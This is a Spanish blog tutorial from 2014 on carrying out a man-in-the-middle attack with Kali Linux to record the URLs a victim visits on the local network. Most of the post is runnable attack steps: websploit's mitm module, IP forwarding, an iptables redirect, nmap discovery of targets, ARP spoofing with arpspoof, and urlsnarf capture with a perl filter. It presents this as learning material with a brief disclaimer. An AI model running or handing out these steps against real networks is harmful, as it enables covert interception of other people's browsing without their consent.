viernes, 14 de febrero de 2014

[Kali Linux] Efectuar MitM para ver urls

Como estoy haciendo una serie de tutoriales de pentest,no tanto en si pentest si no hasta ahora uno de spam otro de  information gathering otro de otra cosa,pero bueno se entiende el propósito,para que se entienda mejor y sea mas sencillo estas practicas recomiendo usar Kali Linux,puede ser Blackbuntu,BlackArch u otra distribución de Linux enfocada a la seguridad informatica. Yo en lo personal me gusta Kali pero en cualquier sistema Linux se pueden instalar los programas que aquí he mencionado y voy a mencionar aunque sea compilando,así que si no tienen las herramientas en su sistema y no tienen Kali Linux pueden buscar como instalar dicha herramienta en su sistema,sea Ubuntu,Arch,openSUSE,Gentoo,Fedora,etc.

Disclamer

Este tutorial es con fines de obtener conocimiento sobre el tema a nivel basico,la ejecución del mismo esta bajo el criterio del leector.

Bien,este tutorial lo pueden efectuar incluso sobre su localhost asi que no hay mucho problema si no tienen una segunda maquina donde hacer las pruebas.

Primero que nada que es MitM:

En criptografía, un ataque man-in-the-middle o JANUS (MitM o intermediario, en español) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación.

Ataques:

El ataque MitM puede incluir algunos de los siguientes subataques:

  • Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos.
  • Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado.
  • Ataques de sustitución.
  • Ataques de repetición.
  • Ataque por denegación de servicio (denial of service). El atacante podría, por ejemplo, bloquear las comunicaciones antes de atacar una de las partes. La defensa en ese caso pasa por el envío periódico de mensajes de status autenticados.

Fuente : es.wikipedia.org

Lo que nosotros vamos a realizar en este tutorial es un eavesdropping pero solo el analisis de trafico a nivel "humano" ya que podemos ver los datos en hex,pero aquí veremos las url directas.

Tutorial


Un nivel  Script Kiddies(automatizando con herramientas existentes),es el siguiente:

Usando websploit

Websploit nos probe una shell como la de Metasploit,como la que hice para ver los exif de una imagen.

Al ejecutar el programa:

websploit
Podemos ver la ayuda con help,al igual que metasploit cuenta con diferentes modulos,nosotros usaremos una para MitM:

use network/mitm

Vemos las opciones:

show options

Como vemos tenemos algunas opcines,vamos a setearlas:

set interface interfaz

set router gateway

set target ip_victima

set sniffer urlsnarf

En interfaz es la interfaz de nuestra red,si estamos por cable ethx,si estamos por wirless,wlanx.

En router ponemos la puerta enlace,para verla desde consola:

netstat -nr

En target ponemos la ip victima,podemos obtenerla haciendo un scan rango 24 con nmap al gateway:

nmap -sP gateway/24

o podemos poner nuestra propia ip dinamica,para no molestar a alquien mas y hacer pruebas.

En sniffer ponemos urlsnarf,este programa nos mostrara las url que esta viendo la ip que asignamos en target.


Ahora solo ejecutamos con:

run


Bien,con eso hacemos todos,cuendo comience a navegar el target nos mostrara las urls.


Ahora un nivel mas bajo,teclear todo nosotros mismos para ver por lo menos como se hace esto:

Primero que nada hacemos ip forward,en linux es tan facil como setear a uno la configuracion del archivo correspondiente:

echo 1 > /proc/sys/net/ipv4/ip_forward

Ahora tenemos que redirigir el trafico del puerto 80 basado en reglas de iptables,por ejemplo al puerto 8080:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Con eso esta listo el enrutamiento.

Ahora vamos a ver lo necesario,gateway y target:

Gateway:

route | sed -n "3p"

Targets:

nmap -sP gateway/24 | grep --color for

Con eso tenemos la informacion necesaria.

Ahora solo falta la suplantacion de ARP:

arpspoof -i interfaz -t gateway ip_victima

Lo podemos hacer dual para no errar.

Ahora solo ejecutamos urlsnarf,para analizar las urls luego lo redirigiremos con un estándar de unix:

urlsnarf -i interfaz  >> captura



 Para ver el resultado podemos hacerlo con cat,less,more:

cat captura
O podemos sacar las urls directamente con,una regex,por ejemplo con perl en una tuberia Unix:





cat captura  | perl  -lane 'while ($_ =~ m/\"(.+)\"/ig){ print $1."\n"}' | grep --color http://
Eso es todo.

Y recuerda si te sirvió y tienes cuenta de google dale google aya abajo

No hay comentarios.:

Publicar un comentario

Los comentarios serán revisados antes de ser publicados.